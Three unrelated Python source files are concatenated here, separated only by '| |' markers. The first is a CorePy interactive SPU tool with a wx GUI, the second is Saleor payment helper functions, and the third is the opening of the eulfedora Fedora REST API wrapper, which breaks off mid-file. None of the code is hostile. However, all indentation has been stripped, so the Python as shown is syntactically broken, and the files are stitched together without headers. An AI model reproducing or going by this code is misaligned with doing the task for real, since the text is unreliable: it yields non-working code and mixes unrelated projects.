# Stick with always executing one instruction at a time, or allow for executing
# more than once before stopping?
# Always doing one at a time is simpler, but slower
# What should the GUI look like?
# Separate windows for the instruction list, registers, local store, mem, etc
class ISPU:
"""
Simple Command line interface to the SPUs.
"""
def __init__(self):
# Code and memory buffers
self.code = env.InstructionStream()
self.regs = extarray.extarray('I', 128 * 4)
self.regs.clear()
# Runtime parameters
self.speid = None
self.reg_lsa = None
self.proc = None
self.synthesize()
return
def synthesize(self):
# Okay. This code is not going to exceed 256 instructions (1kb). Knowing that,
# the register contents can be safely placed at 0x3F400 in localstore, 3kb from
# the top. The SPRE will place the instruction stream as close to the top as
# possible. But since it is not going to be more than 1kb worth of instructions,
# it will not overlap with the register contents.
code = self.code
spu.set_active_code(code)
# Reload the instructions
spu.sync(1)
# Next instruction to execute
lbl_op = code.size()
spu.nop(0)
# Placeholders for register store instructions
for i in range(128):
spu.stqa(i, 0xFD00 + (i * 4))
# spu.stqa(i, 0xFE00 + (i * 4))
# Stop for next command
spu.stop(0x0FFF)
lbl_regs = code.size()
# Create space for the saved registers
#for i in range(128):
# # 16 bytes/register
# spu.nop(0)
# spu.lnop()
# spu.nop(0)
# spu.lnop()
# Clearing active code here is important!
spu.set_active_code(None)
code.cache_code()
code_size = len(code._prologue._code) * 4
self.xfer_size = code_size + (16 - (code_size) % 16);
print 'xfer_size:', self.xfer_size
self.code_lsa = (0x3FFFF - code_size) & 0xFFF80;
self.lbl_op = lbl_op
return
def load_regs(self):
env.spu_exec.spu_putb(self.speid, 0x3F400, self.regs.buffer_info()[0],
128 * 16, 2, 0, 0)
env.spu_exec.read_tag_status(self.speid, 1 << 2)
return
def get_regs(self):
self.load_regs()
regs = []
for reg in range(128):
regs.append((self.regs[reg * 4],
self.regs[reg * 4 + 1],
self.regs[reg * 4 + 2],
self.regs[reg * 4 + 3]))
return regs
def print_regs(self):
self.load_regs()
for i in range(64):
reg = i
print 'r%03d: 0x%08X 0x%08X 0x%08X 0x%08X' % (
reg, self.regs[reg * 4],
self.regs[reg * 4 + 1],
self.regs[reg * 4 + 2],
self.regs[reg * 4 + 3]),
reg = i + 64
print 'r%03d: 0x%08X 0x%08X 0x%08X 0x%08X' % (
reg, self.regs[reg * 4],
self.regs[reg * 4 + 1],
self.regs[reg * 4 + 2],
self.regs[reg * 4 + 3])
return
def start(self):
self.started = True
#self.proc = env.Processor()
#self.speid = self.proc.execute(self.code, async = True, debug = False)
#env.spu_exec.wait(self.speid)
self.code_len = len(self.code._code_array) * self.code._code_array.itemsize
if self.code_len % 16 != 0:
self.code_len += 16 - (self.code_len % 16)
self.code_lsa = 0x40000 - self.code_len
self.ctx = env.spu_exec.alloc_context()
self.code.cache_code()
env.spu_exec.run_stream(self.ctx, self.code.start_addr(), self.code_len, self.code_lsa, self.code_lsa)
return
def stop(self):
env.spu_exec.free_context(self.ctx)
self.ctx = None
self.started = False
return
def execute(self, cmd):
if self.started != True:
print "ERROR ISPU not started; do ISPU.start() first"
return
self.code[self.lbl_op] = cmd
self.code.cache_code()
env.spu_exec.run_stream(self.ctx, self.code.start_addr(), self.code_len, self.code_lsa, self.code_lsa)
return
try:
import wx
except:
print 'Warning: wx not found. GUI is not available'
wx = None
class RegisterWindow(wx.Panel):
def __init__(self, parent, id = -1):
wx.Panel.__init__(self, parent, id)
self._buildGUI()
return
def _buildGUI(self):
listRegs = wx.ListCtrl(self, -1, style=wx.LC_REPORT | wx.SUNKEN_BORDER)
listRegs.InsertColumn(0, 'Register')
listRegs.InsertColumn(1, 'Value')
fixedFont = wx.Font(11, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
for i in range(128):
idx = listRegs.InsertStringItem(i, '%d' % (i))
listRegs.SetStringItem(idx, 1, '0x???????? 0x???????? 0x???????? 0x????????')
listRegs.SetItemData(idx, i)
listRegs.SetItemFont(idx, fixedFont)
listRegs.SetColumnWidth(0, wx.LIST_AUTOSIZE_USEHEADER)
listRegs.SetColumnWidth(1, 350) # wx.LIST_AUTOSIZE)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(listRegs, 1, wx.EXPAND)
sizer.Layout()
self.SetSizer(sizer)
self.listRegs = listRegs
return
def HighlightReg(self, reg, highlight):
if not highlight:
self.listRegs.SetItemBackgroundColour(reg, wx.WHITE)
else:
self.listRegs.SetItemBackgroundColour(reg, wx.RED)
self.listRegs.EnsureVisible(reg)
return
def SetRegValue(self, reg, value):
self.listRegs.SetStringItem(reg, 1, '0x%08X 0x%08X 0x%08X 0x%08X' % value)
return
class SPUApp(wx.App):
def OnInit(self):
print """
*** Thank you for using the wxPython Interactive SPU ***
To use, simply type any SPU ISA command into the command box using
the CorePy ISA syntax and with integer values for registers. For
example, to create and add two vectors, enter the following
commands one at time followed by a return:
ai(11, 0, 127)
ai(31, 0, 126)
a(127, 126, 125)
ISPU will highlight registers as they change.
Previous instructions can be accessed from the history list using
the up/down arrow keys.
Type 'quit' or close the window to exit.
*** Email chemuell@cs.indiana.edu with any questions/comments ***
"""
self.lastDiffs = []
self.regDiffs = []
self.history = []
self.currentCmd = -1
self._buildGUI()
self._startSPU()
return True
def _buildGUI(self):
frame = wx.Frame(None, -1, 'Interactive SPU')
stcCmd = wx.StaticText(frame, -1, 'Command:')
txtCmd = wx.TextCtrl(frame, -1, style = wx.TE_PROCESS_ENTER)
txtSizer = wx.BoxSizer(wx.HORIZONTAL)
txtSizer.Add((5,-1))
txtSizer.Add(stcCmd, flag = wx.ALIGN_CENTER)
txtSizer.Add(txtCmd, 1)
txtSizer.Add((5,-1))
txtSizer.Layout()
listRegs = RegisterWindow(frame)
cmdSizer = wx.BoxSizer(wx.VERTICAL)
cmdSizer.Add(listRegs, 1, wx.EXPAND)
cmdSizer.Add((-1,2))
cmdSizer.Add(txtSizer, 0, wx.EXPAND)
cmdSizer.Add((-1,2))
cmdSizer.Layout()
lstHistory = wx.ListCtrl(frame, -1, size = (150, -1),
style = (wx.LC_REPORT | wx.LC_NO_HEADER | wx.LC_SINGLE_SEL |
wx.SUNKEN_BORDER))
lstHistory.InsertColumn(0, 'Command History', -1)
lstHistory.SetColumnWidth(0, 120)
mainSizer = wx.BoxSizer(wx.HORIZONTAL)
mainSizer.Add(cmdSizer, 1, wx.EXPAND)
mainSizer.Add(lstHistory, 0, wx.EXPAND)
mainSizer.Layout()
frame.SetSizer(mainSizer)
frame.Show(True)
self.Bind(wx.EVT_TEXT_ENTER, self.OnExecute, id=txtCmd.GetId())
self.Bind(wx.EVT_CHAR, self.OnChar, id=txtCmd.GetId())
self.txtCmd = txtCmd
self.lstHistory = lstHistory
self.listRegs = listRegs
self.frame = frame
return
def _startSPU(self):
cli = ISPU()
cli.start()
# self.lastRegs = cli.get_regs()
self.lastRegs = [(0,0,0,0) for i in range(128)]
self._updateRegView(True)
self.cli = cli
return
def _updateRegs(self):
regs = self.cli.get_regs()
self.lastDiffs = self.regDiffs
diffs = []
for i in range(128):
if regs[i] != self.lastRegs[i]:
diffs.append(i)
self.regDiffs = diffs
self.lastRegs = regs
return
def _updateRegView(self, all = False):
if all:
for reg in range(128):
self.listRegs.SetRegValue(reg, self.lastRegs[reg])
self.listRegs.HighlightReg(reg, False)
for diff in self.lastDiffs:
self.listRegs.HighlightReg(diff, False)
for diff in self.regDiffs:
self.listRegs.SetRegValue(diff, self.lastRegs[diff])
self.listRegs.HighlightReg(diff, True)
return
def _executeSPU(self, cmd):
try:
inst = eval('spu.%s' % cmd)
except:
print 'Error creating command: %s' % cmd
else:
self.cli.execute(inst)
self._updateRegs()
self._updateRegView()
return
def _setCurrent(self, idx):
if self.currentCmd != -1:
self.lstHistory.SetItemBackgroundColour(self.currentCmd, wx.WHITE)
self.lstHistory.SetItemTextColour(self.currentCmd, wx.BLACK)
self.currentCmd = idx
if idx == -1:
self.lstHistory.SetItemBackgroundColour(self.currentCmd, wx.WHITE)
self.lstHistory.SetItemTextColour(self.currentCmd, wx.BLACK)
else:
self.lstHistory.SetItemBackgroundColour(self.currentCmd, wx.BLUE)
self.lstHistory.SetItemTextColour(self.currentCmd, wx.WHITE)
self.lstHistory.EnsureVisible(self.currentCmd)
return
def OnChar(self, event):
key = event.GetKeyCode()
if len(self.history) == 0:
pass
elif key == wx.WXK_UP:
# print 'up'
idx = self.currentCmd
if idx == -1: idx = len(self.history) - 1
else: idx -= 1
self._setCurrent(idx)
self.txtCmd.SetValue(self.history[self.currentCmd])
elif key == wx.WXK_DOWN and (self.currentCmd + 1) < len(self.history):
# print 'down'
idx = self.currentCmd
if idx == -1: idx = len(self.history) - 1
else: idx += 1
self._setCurrent(idx)
self.txtCmd.SetValue(self.history[self.currentCmd])
event.Skip()
return
def OnExecute(self, event):
cmd = self.txtCmd.GetValue()
if cmd == 'quit':
self.frame.Close()
else:
self._executeSPU(cmd)
self.txtCmd.Clear()
cmdIdx = len(self.history)
self.history.append(cmd)
self.lstHistory.InsertStringItem(cmdIdx, cmd)
self.lstHistory.EnsureVisible(cmdIdx)
self._setCurrent(-1)
return
if __name__=='__main__':
# cli = ISPU()
# cli.start()
# cli.execute(spu.ai(11, 0, 127))
# cli.execute(spu.ai(31, 0, 126))
# cli.execute(spu.a(127, 126, 125))
# cli.print_regs()
# cli.stop()
app = SPUApp(0)
app.MainLoop()
| |
import json
import logging
from decimal import Decimal
from typing import Dict
from django.conf import settings
from django.core.serializers.json import DjangoJSONEncoder
from django.db import transaction
from ..account.models import Address
from ..checkout.models import Checkout
from ..order.actions import handle_fully_paid_order
from ..order.models import Order
from . import ChargeStatus, GatewayError, PaymentError, TransactionKind
from .interface import AddressData, GatewayResponse, PaymentData
from .models import Payment, Transaction
logger = logging.getLogger(__name__)
GENERIC_TRANSACTION_ERROR = "Transaction was unsuccessful"
ALLOWED_GATEWAY_KINDS = {choices[0] for choices in TransactionKind.CHOICES}
GATEWAYS_META_NAMESPACE = "payment-gateways"
def create_payment_information(
payment: Payment,
payment_token: str = None,
amount: Decimal = None,
billing_address: AddressData = None,
shipping_address: AddressData = None,
customer_id: str = None,
store_source: bool = False,
) -> PaymentData:
"""Extract order information along with payment details.
Returns information required to process payment and additional
billing/shipping addresses for optional fraud-prevention mechanisms.
"""
billing, shipping = None, None
if billing_address is None and payment.order and payment.order.billing_address:
billing = AddressData(**payment.order.billing_address.as_data())
if shipping_address is None and payment.order and payment.order.shipping_address:
shipping = AddressData(**payment.order.shipping_address.as_data())
order_id = payment.order.pk if payment.order else None
return PaymentData(
token=payment_token,
amount=amount or payment.total,
currency=payment.currency,
billing=billing or billing_address,
shipping=shipping or shipping_address,
order_id=order_id,
customer_ip_address=payment.customer_ip_address,
customer_id=customer_id,
customer_email=payment.billing_email,
reuse_source=store_source,
)
def create_payment(
gateway: str,
total: Decimal,
currency: str,
email: str,
billing_address: Address,
customer_ip_address: str = "",
payment_token: str = "",
extra_data: Dict = None,
checkout: Checkout = None,
order: Order = None,
) -> Payment:
"""Create a payment instance.
This method is responsible for creating payment instances that works for
both Django views and GraphQL mutations.
"""
defaults = {
"billing_email": email,
"billing_first_name": billing_address.first_name,
"billing_last_name": billing_address.last_name,
"billing_company_name": billing_address.company_name,
"billing_address_1": billing_address.street_address_1,
"billing_address_2": billing_address.street_address_2,
"billing_city": billing_address.city,
"billing_postal_code": billing_address.postal_code,
"billing_country_code": billing_address.country.code,
"billing_country_area": billing_address.country_area,
"currency": currency,
"gateway": gateway,
"total": total,
}
if extra_data is None:
extra_data = {}
data = {
"is_active": True,
"customer_ip_address": customer_ip_address,
"extra_data": extra_data,
"token": payment_token,
}
if order is not None:
data["order"] = order
if checkout is not None:
data["checkout"] = checkout
payment, _ = Payment.objects.get_or_create(defaults=defaults, **data)
return payment
def create_transaction(
payment: Payment,
kind: str,
payment_information: PaymentData,
gateway_response: GatewayResponse = None,
error_msg=None,
) -> Transaction:
"""Create a transaction based on transaction kind and gateway response."""
# Default values for token, amount, currency are only used in cases where
# response from gateway was invalid or an exception occured
if not gateway_response:
gateway_response = GatewayResponse(
kind=kind,
action_required=False,
transaction_id=payment_information.token,
is_success=False,
amount=payment_information.amount,
currency=payment_information.currency,
error=error_msg,
raw_response={},
)
txn = Transaction.objects.create(
payment=payment,
kind=gateway_response.kind,
token=gateway_response.transaction_id,
is_success=gateway_response.is_success,
amount=gateway_response.amount,
currency=gateway_response.currency,
error=gateway_response.error,
customer_id=gateway_response.customer_id,
gateway_response=gateway_response.raw_response or {},
)
return txn
def clean_capture(payment: Payment, amount: Decimal):
"""Check if payment can be captured."""
if amount <= 0:
raise PaymentError("Amount should be a positive number.")
if not payment.can_capture():
raise PaymentError("This payment cannot be captured.")
if amount > payment.total or amount > (payment.total - payment.captured_amount):
raise PaymentError("Unable to charge more than un-captured amount.")
def clean_authorize(payment: Payment):
"""Check if payment can be authorized."""
if not payment.can_authorize():
raise PaymentError("Charged transactions cannot be authorized again.")
def validate_gateway_response(response: GatewayResponse):
"""Validate response to be a correct format for Saleor to process."""
if not isinstance(response, GatewayResponse):
raise GatewayError("Gateway needs to return a GatewayResponse obj")
if response.kind not in ALLOWED_GATEWAY_KINDS:
raise GatewayError(
"Gateway response kind must be one of {}".format(
sorted(ALLOWED_GATEWAY_KINDS)
)
)
if response.currency != settings.DEFAULT_CURRENCY:
logger.warning("Transaction currency is different than Saleor's.")
try:
json.dumps(response.raw_response, cls=DjangoJSONEncoder)
except (TypeError, ValueError):
raise GatewayError("Gateway response needs to be json serializable")
@transaction.atomic
def gateway_postprocess(transaction, payment):
if not transaction.is_success:
return
transaction_kind = transaction.kind
if transaction_kind in {TransactionKind.CAPTURE, TransactionKind.CONFIRM}:
payment.captured_amount += transaction.amount
# Set payment charge status to fully charged
# only if there is no more amount needs to charge
payment.charge_status = ChargeStatus.PARTIALLY_CHARGED
if payment.get_charge_amount() <= 0:
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.save(update_fields=["charge_status", "captured_amount"])
order = payment.order
if order and order.is_fully_paid():
handle_fully_paid_order(order)
elif transaction_kind == TransactionKind.VOID:
payment.is_active = False
payment.save(update_fields=["is_active"])
elif transaction_kind == TransactionKind.REFUND:
changed_fields = ["captured_amount"]
payment.captured_amount -= transaction.amount
payment.charge_status = ChargeStatus.PARTIALLY_REFUNDED
if payment.captured_amount <= 0:
payment.charge_status = ChargeStatus.FULLY_REFUNDED
payment.is_active = False
changed_fields += ["charge_status", "is_active"]
payment.save(update_fields=changed_fields)
def fetch_customer_id(user, gateway):
"""Retrieve users customer_id stored for desired gateway."""
key = prepare_namespace_name(gateway)
gateway_config = {}
if hasattr(user, "get_private_meta"):
gateway_config = user.get_private_meta(
namespace=GATEWAYS_META_NAMESPACE, client=key
)
return gateway_config.get("customer_id", None)
def store_customer_id(user, gateway, customer_id):
"""Store customer_id in users private meta for desired gateway."""
user.store_private_meta(
namespace=GATEWAYS_META_NAMESPACE,
client=prepare_namespace_name(gateway),
item={"customer_id": customer_id},
)
user.save(update_fields=["private_meta"])
def prepare_namespace_name(s):
return s.strip().upper()
def update_card_details(payment, gateway_response):
payment.cc_brand = gateway_response.card_info.brand or ""
payment.cc_last_digits = gateway_response.card_info.last_4
payment.cc_exp_year = gateway_response.card_info.exp_year
payment.cc_exp_month = gateway_response.card_info.exp_month
payment.save(
update_fields=["cc_brand", "cc_last_digits", "cc_exp_year", "cc_exp_month"]
)
def get_payment_token(payment: Payment):
auth_transaction = payment.transactions.filter(
kind=TransactionKind.AUTH, is_success=True
).first()
if auth_transaction is None:
raise PaymentError("Cannot process unauthorized transaction")
return auth_transaction.token
| |
# file eulfedora/api.py
#
# Copyright 2010,2011 Emory University Libraries
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import csv
import logging
import requests
import time
import warnings
from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor, \
user_agent
import six
from six.moves.urllib.parse import urljoin
try:
from django.dispatch import Signal
except ImportError:
Signal = None
from eulfedora import __version__ as eulfedora_version
from eulfedora.util import datetime_to_fedoratime, \
RequestFailed, ChecksumMismatch, PermissionDenied, parse_rdf, \
ReadableIterator, force_bytes
logger = logging.getLogger(__name__)
# low-level wrappers
# bind a signal for tracking api calls; used by debug panel
if Signal is not None:
api_called = Signal(providing_args=[
"time_taken", "method", "url", "args", "kwargs"])
else:
api_called = None
class HTTP_API_Base(object):
def __init__(self, base_url, username=None, password=None, retries=None):
# standardize url format; ensure we have a trailing slash,
# adding one if necessary
if not base_url.endswith('/'):
base_url = base_url + '/'
# create a new session and add to global sessions
self.session = requests.Session()
# Set headers to be passed with every request
# NOTE: only headers that will be common for *all* requests
# to this fedora should be set in the session
# (i.e., do NOT include auth information here)
# NOTE: ssl verification is turned on by default
self.session.headers = {
# use requests-toolbelt user agent
'User-Agent': user_agent('eulfedora', eulfedora_version),
}
# no retries is requests current default behavior, so only
# customize if a value is set
if retries is not None:
adapter = requests.adapters.HTTPAdapter(max_retries=retries)
self.session.mount('http://', adapter)
self.session.mount('https://', adapter)
self.base_url = base_url
self.username = username
self.password = password
self.request_options = {}
if self.username is not None:
# store basic auth option to pass when making requests
self.request_options['auth'] = (self.username, self.password)
def absurl(self, rel_url):
return urljoin(self.base_url, rel_url)
def prep_url(self, url):
return self.absurl(url)
# thinnest possible wrappers around requests calls
# - add auth, make urls absolute
def _make_request(self, reqmeth, url, *args, **kwargs):
# copy base request options and update with any keyword args
rqst_options = self.request_options.copy()
rqst_options.update(kwargs)
start = time.time()
response = reqmeth(self.prep_url(url), *args, **rqst_options)
total_time = time.time() - start
logger.debug('%s %s=>%d: %f sec', reqmeth.__name__.upper(), url,
response.status_code, total_time)
# if django signals are available, send api called
if api_called is not None:
api_called.send(sender=self.__class__, time_taken=total_time,
method=reqmeth, url=url, response=response,
args=args, kwargs=kwargs)
# NOTE: currently doesn't do anything with 3xx responses
# (likely handled for us by requests)
if response.status_code >= requests.codes.bad: # 400 or worse
# separate out 401 and 403 (permission errors) to enable
# special handling in client code.
if response.status_code in (requests.codes.unauthorized,
requests.codes.forbidden):
raise PermissionDenied(response)
elif response.status_code == requests.codes.server_error:
# check response content to determine if this is a
# ChecksumMismatch or a more generic error
if 'Checksum Mismatch' in response.text:
raise ChecksumMismatch(response)
else:
raise RequestFailed(response)
else:
raise RequestFailed(response)
return response
def get(self, *args, **kwargs):
return self._make_request(self.session.get, *args, **kwargs)
def head(self, *args, **kwargs):
return self._make_request(self.session.head, *args, **kwargs)
def put(self, *args, **kwargs):
return self._make_request(self.session.put, *args, **kwargs)
def post(self, *args, **kwargs):
return self._make_request(self.session.post, *args, **kwargs)
def delete(self, *args, **kwargs):
return self._make_request(self.session.delete, *args, **kwargs)
# also available: head, patch
class REST_API(HTTP_API_Base):
"""Python object for accessing
`Fedora's REST API <https://wiki.duraspace.org/display/FEDORA38/REST+API>`_.
Most methods return an HTTP :class:`requests.models.Response`, which
provides access to status code and headers as well as content. Many
responses with XML content can be loaded using models in
:mod:`eulfedora.xml`.
"""
# always return xml response instead of html version
format_xml = {'format': 'xml'}
### API-A methods (access) ####
# describeRepository not implemented in REST, use API-A-LITE version
def findObjects(self, query=None, terms=None, pid=True, chunksize=None, session_token=None):
"""
Wrapper function for `Fedora REST API findObjects <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-findObjects>`_
and `Fedora REST API resumeFindObjects <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-resumeFindObjects>`_
One and only one of query or terms must be specified.
:param query: string of fields and terms to search for
:param terms: phrase search across all fields
:param pid: include pid in search results
:param chunksize: number of objects to return at a time
:param session_token: get an additional chunk of results from a prior search
:param parse: optional data parser function; defaults to returning
raw string data
:rtype: :class:`requests.models.Response`
"""
if query is not None and terms is not None:
raise Exception("Cannot findObject with both query ('%s') and terms ('%s')" % (query, terms))
http_args = {'resultFormat': 'xml'}
if query is not None:
http_args['query'] = query
if terms is not None:
http_args['terms'] = terms
if pid:
http_args['pid'] = 'true'
if session_token:
http_args['sessionToken'] = session_token
if chunksize:
http_args['maxResults'] = chunksize
return self.get('objects', params=http_args)
def getDatastreamDissemination(self, pid, dsID, asOfDateTime=None, stream=False,
head=False, rqst_headers=None):
"""Get a single datastream on a Fedora object; optionally, get the version
as of a particular date time.
:param pid: object pid
:param dsID: datastream id
:param asOfDateTime: optional datetime; ``must`` be a non-naive datetime
so it can be converted to a date-time format Fedora can understand
:param stream: return a streaming response (default: False); use
is recommended for large datastreams
:param head: return a HEAD request instead of GET (default: False)
:param rqst_headers: request headers to be passed through to Fedora,
such as http range requests
:rtype: :class:`requests.models.Response`
"""
# /objects/{pid}/datastreams/{dsID}/content ? [asOfDateTime] [download]
http_args = {}
if rqst_headers is None:
rqst_headers = {}
if asOfDateTime:
http_args['asOfDateTime'] = datetime_to_fedoratime(asOfDateTime)
url = 'objects/%(pid)s/datastreams/%(dsid)s/content' % \
{'pid': pid, 'dsid': dsID}
if head:
reqmethod = self.head
else:
reqmethod = self.get
return reqmethod(url, params=http_args, stream=stream, headers=rqst_headers)
# NOTE:
def getDissemination(self, pid, sdefPid, method, method_params=None):
'''Get a service dissemination.
.. NOTE:
This method not available in REST API until Fedora 3.3
:param pid: object pid
:param sDefPid: service definition pid
:param method: service method name
:param method_params: method parameters
:rtype: :class:`requests.models.Response`
'''
# /objects/{pid}/methods/{sdefPid}/{method} ? [method parameters]
if method_params is None:
method_params = {}
uri = 'objects/%(pid)s/methods/%(sdefpid)s/%(method)s' % \
{'pid': pid, 'sdefpid': sdefPid, 'method': method}
return self.get(uri, params=method_params)
def getObjectHistory(self, pid):
'''Get the history for an object in XML format.
:param pid: object pid
:rtype: :class:`requests.models.Response`
'''
# /objects/{pid}/versions ? [format]
return self.get('objects/%(pid)s/versions' % {'pid': pid},
params=self.format_xml)
def getObjectProfile(self, pid, asOfDateTime=None):
"""Get top-level information aboug a single Fedora object; optionally,
retrieve information as of a particular date-time.
:param pid: object pid
:param asOfDateTime: optional datetime; ``must`` be a non-naive datetime
so it can be converted to a date-time format Fedora can understand
:rtype: :class:`requests.models.Response`
"""
# /objects/{pid} ? [format] [asOfDateTime]
http_args = {}
if asOfDateTime:
http_args['asOfDateTime'] = datetime_to_fedoratime(asOfDateTime)
http_args.update(self.format_xml)
url = 'objects/%(pid)s' % {'pid': pid}
return self.get(url, params=http_args)
def listDatastreams(self, pid):
"""
Get a list of all datastreams for a specified object.
Wrapper function for `Fedora REST API listDatastreams <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-listDatastreams>`_
:param pid: string object pid
:param parse: optional data parser function; defaults to returning
raw string data
:rtype: :class:`requests.models.Response`
"""
# /objects/{pid}/datastreams ? [format, datetime]
return self.get('objects/%(pid)s/datastreams' % {'pid': pid},
params=self.format_xml)
def listMethods(self, pid, sdefpid=None):
'''List available service methods.
:param pid: object pid
:param sDefPid: service definition pid
:rtype: :class:`requests.models.Response`
'''
# /objects/{pid}/methods ? [format, datetime]
# /objects/{pid}/methods/{sdefpid} ? [format, datetime]
## NOTE: getting an error when sdefpid is specified; fedora issue?
uri = 'objects/%(pid)s/methods' % {'pid': pid}
if sdefpid:
uri += '/' + sdefpid
return self.get(uri, params=self.format_xml)
### API-M methods (management) ####
def addDatastream(self, pid, dsID, dsLabel=None, mimeType=None, logMessage=None,
controlGroup=None, dsLocation=None, altIDs=None, versionable=None,
dsState=None, formatURI=None, checksumType=None, checksum=None, content=None):
'''Add a new datastream to an existing object. On success,
the return response should have a status of 201 Created;
if there is an error, the response body includes the error message.
:param pid: object pid
:param dsID: id for the new datastream
:param dslabel: label for the new datastream (optional)
:param mimeType: mimetype for the new datastream (optional)
:param logMessage: log message for the object history (optional)
:param controlGroup: control group for the new datastream (optional)
:param dsLocation: URL where the content should be ingested from
:param altIDs: alternate ids (optional)
:param versionable: configure datastream versioning (optional)
:param dsState: datastream state (optional)
:param formatURI: datastream format (optional)
:param checksumType: checksum type (optional)
:param checksum: checksum (optional)
:param content: datastream content, as a file-like object or
characterdata (optional)
:rtype: :class:`requests.models.Response`
'''
# objects/{pid}/datastreams/NEWDS? [opts]
# content via multipart file in request content, or dsLocation=URI
# one of dsLocation or filename must be specified
# if checksum is sent without checksum type, Fedora seems to
# ignore it (does not error on invalid checksum with no checksum type)
if checksum is not None and checksumType is None:
warnings.warn('Fedora will ignore the checksum (%s) because no checksum type is specified' \
% checksum)
http_args = {}
if dsLabel:
http_args['dsLabel'] = dsLabel
if mimeType:
http_args['mimeType'] = mimeType
if logMessage:
http_args['logMessage'] = logMessage
if controlGroup:
http_args['controlGroup'] = controlGroup
if dsLocation:
http_args['dsLocation'] = dsLocation
if altIDs:
http_args['altIDs'] = altIDs
if versionable is not None:
http_args['versionable'] = versionable
if dsState:
http_args['dsState'] = dsState
if formatURI:
http_args['formatURI'] = formatURI
if checksumType:
http_args['checksumType'] = checksumType
if checksum:
http_args['checksum'] = checksum
# Added code to match how content is now handled, see modifyDatastream.
extra_args = {}
# could be a string or a file-like object
if content:
if hasattr(content, 'read'): # if content is a file-like object, warn if no checksum
if not checksum:
logger.warning("File was ingested into fedora without a passed checksum for validation, pid was: %s and dsID was: %s.",
pid, dsID)
extra_args['files'] = {'file': content}
else:
# fedora wants a multipart file upload;
# this seems to work better for handling unicode than
# simply sending content via requests data parameter
extra_args['files'] = {'file': ('filename', content)}
# set content-type header ?
url = 'objects/%s/datastreams/%s' % (pid, dsID)
return self.post(url, params=http_args, **extra_args)
# expected response: 201 Created (on success)
# when pid is invalid, response body contains error message
# e.g., no path in db registry for [bogus:pid]
# return success/failure and any additional information
# return (r.status_code == requests.codes.created, r.content)
def addRelationship(self, pid, subject, predicate, object, isLiteral=False,
datatype=None):
"""
Wrapper function for `Fedora REST API addRelationship <https://wiki.duraspace.org/display/FEDORA34/REST+API#RESTAPI-addRelationship>`_
:param pid: persistent id for the object to add the new relationship to
:param subject: subject of the relationship; object or datastream URI
:param predicate: predicate of the new relationship
:param object: object of the relationship
:param isLiteral: true if object is literal, false if it is a URI;
Fedora has no default; this method defaults to False
:param datatype: optional datatype for literal objects
:returns: boolean success
"""
http_args = {'subject': subject, 'predicate': predicate,
'object': object, 'isLiteral': isLiteral}
if datatype is not None:
http_args['datatype'] = datatype
url = 'objects/%(pid)s/relationships/new' % {'pid': pid}
response = self.post(url, params=http_args)
return response.status_code == requests.codes.ok
def compareDatastreamChecksum(self, pid, dsID, asOfDateTime=None): # date time
'''Compare (validate) datastream checksum. This is a special case of
:meth:`getDatastream`, with validate checksum set to True. Fedora
will recalculate the checksum and compare it to the stored value.
Response is the same content returned by :meth:`getDatastream`,
with validation result included in the xml.
:rtype: :class:`requests.models.Response`
'''
# special case of getDatastream, with validateChecksum = true
# currently returns datastream info returned by getDatastream... what should it return?
return self.getDatastream(pid, dsID, validateChecksum=True, asOfDateTime=asOfDateTime)
def export(self, pid, context=None, format=None, encoding=None,
stream=False):
'''Export an object to be migrated or archived.
:param pid: object pid
:param context: export context, one of: public, migrate, archive
(default: public)
:param format: export format (Fedora default is foxml 1.1)
:param encoding: encoding (Fedora default is UTF-8)
:param stream: if True, request a streaming response to be
read in chunks
:rtype: :class:`requests.models.Response`
'''
http_args = {}
if context:
http_args['context'] = context
if format:
http_args['format'] = format
if encoding:
http_args['encoding'] = encoding
uri = 'objects/%s/export' % pid
return self.get(uri, params=http_args, stream=stream)
def getDatastream(self, pid, dsID, asOfDateTime=None, validateChecksum=False):
"""Get information about a single datastream on a Fedora object; optionally,
get information for the version of the datastream as of a particular date time.
:param pid: object pid
:param dsID: datastream id
:param asOfDateTime: optional datetime; ``must`` be a non-naive datetime
so it can be converted to a date-time format Fedora can understand
:param validateChecksum: boolean; if True, request Fedora to recalculate
and verify the stored checksum against actual data
:rtype: :class:`requests.models.Response`
"""
# /objects/{pid}/datastreams/{dsID} ? [asOfDateTime] [format] [validateChecksum]
http_args = {}
if validateChecksum:
# fedora only responds to lower-case validateChecksum option
http_args['validateChecksum'] = str(validateChecksum).lower()
if asOfDateTime:
http_args['asOfDateTime'] = datetime_to_fedoratime(asOfDateTime)
http_args.update(self.format_xml)
uri = 'objects/%(pid)s/datastreams/%(dsid)s' % {'pid': pid, 'dsid': dsID}
return self.get(uri, params=http_args)
def getDatastreamHistory(self, pid, dsid, format=None):
'''Get history information for a datastream.
:param pid: object pid
:param dsid: datastream id
:param format: format
:rtype: :class:`requests.models.Response`
'''
http_args = {}
if format is not None:
http_args['format'] = format
# Fedora docs say the url should be:
# /objects/{pid}/datastreams/{dsid}/versions
# In Fedora 3.4.3, that 404s but /history does not
uri = 'objects/%(pid)s/datastreams/%(dsid)s/history' % \
{'pid': pid, 'dsid': dsid}
return self.get(uri, params=http_args)
# getDatastreams not implemented in REST API
def getNextPID(self, numPIDs=None, namespace=None):
"""
Wrapper function for `Fedora REST API getNextPid <http://fedora-commons.org/confluence/display/FCR30/REST+API#RESTAPI-getNextPID>`_
:param numPIDs: (optional) get the specified number of pids;
by default, returns 1
:param namespace: (optional) get the next pid in the specified
pid namespace; otherwise, Fedora will return the next pid
in the configured default namespace.
:rtype: string (if only 1 pid requested) or list of strings (multiple pids)
"""
http_args = {'format': 'xml'}
if numPIDs:
http_args['numPIDs'] = numPIDs
if namespace:
http_args['namespace'] = namespace
rel_url = 'objects/nextPID'
return self.post(rel_url, params=http_args)
def getObjectXML(self, pid):
"""Return the entire xml for the specified object.
